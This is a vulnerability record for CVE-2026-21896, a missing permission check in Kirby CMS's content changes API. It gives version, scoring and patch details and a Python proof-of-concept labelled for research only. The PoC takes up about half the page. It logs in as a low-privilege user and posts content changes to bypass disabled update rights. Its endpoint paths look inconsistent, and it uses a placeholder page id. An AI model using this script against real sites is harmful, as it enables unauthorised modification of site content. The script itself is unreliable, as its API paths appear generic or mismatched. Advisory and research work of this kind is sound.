Security Vulnerability Report
CVE-2026-21896 CVSS 5.7 MEDIUM

Published: 2026-01-08 18:16:00
Last Modified: 2026-02-02 19:02:52

Description

Kirby is an open-source content management system. From versions 5.0.0 to 5.2.1, Kirby is missing permission checks in the content changes API. This vulnerability affects all Kirby sites where user permissions are configured to prevent specific role(s) from performing write actions, specifically by disabling the update permission with the intent to prevent modifications to site content. This vulnerability does not affect sites that have not deviated from the default user permissions. This issue has been patched in version 5.2.2.

CVSS Details

CVSS Score: 5.7
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:getkirby:kirby:*:*:*:*:*:*:*:* - VULNERABLE
Kirby CMS 5.0.0
Kirby CMS 5.0.1
Kirby CMS 5.0.2
Kirby CMS 5.0.3
Kirby CMS 5.1.0
Kirby CMS 5.1.1
Kirby CMS 5.1.2
Kirby CMS 5.1.3
Kirby CMS 5.1.4
Kirby CMS 5.1.5
Kirby CMS 5.2.0
Kirby CMS 5.2.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import json

# CVE-2026-21896 PoC - Kirby CMS Permission Bypass in Content Changes API
# Target: Kirby CMS versions 5.0.0 to 5.2.1

TARGET_URL = "http://target-website.com"
USERNAME = "low_privilege_user"
PASSWORD = "user_password"


def exploit_kirby_permission_bypass():
    """
    This PoC demonstrates the permission bypass vulnerability in Kirby's content changes API.
    A user with update permission disabled can still modify content via this API endpoint.
    """
    session = requests.Session()

    # Step 1: Authenticate with low-privilege account
    login_url = f"{TARGET_URL}/kirby/api/auth/login"
    login_data = {
        "email": USERNAME,
        "password": PASSWORD
    }
    response = session.post(login_url, json=login_data)
    if response.status_code != 200:
        print("[-] Authentication failed")
        return False
    print("[+] Authentication successful")

    # Step 2: Attempt to modify content via content changes API
    # This should fail if permissions are properly checked, but succeeds due to the vulnerability
    content_api_url = f"{TARGET_URL}/api/content/changes"
    exploit_data = {
        "page": "configurable-page-id",
        "content": {
            "title": "Malicious Content Modified via Bypass",
            "text": "This content was modified despite update permission being disabled"
        }
    }
    response = session.post(content_api_url, json=exploit_data)
    if response.status_code == 200:
        print("[+] Content modification successful - Permission bypass confirmed!")
        print(f"[+] Response: {response.json()}")
        return True
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        return False


if __name__ == "__main__":
    exploit_kirby_permission_bypass()
```

References

https://github.com/getkirby/kirby/security/advisories/GHSA-4j78-4xrm-cr2f (Vendor Advisory, Patch)
https://github.com/getkirby/kirby/commit/f5ce1347b427b819bf193acf11fd0da232f7af47 (Patch)
https://github.com/getkirby/kirby/releases/tag/5.2.2 (Product, Release Notes)

Additional Record Data

Weakness: CWE-863 (Incorrect Authorization)
Affected range: 5.0.0 (inclusive) up to 5.2.2 (exclusive)
CVSS 4.0 Score (secondary): 5.8 MEDIUM
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
CVSS 3.1 Exploitability Score: 2.1, Impact Score: 3.6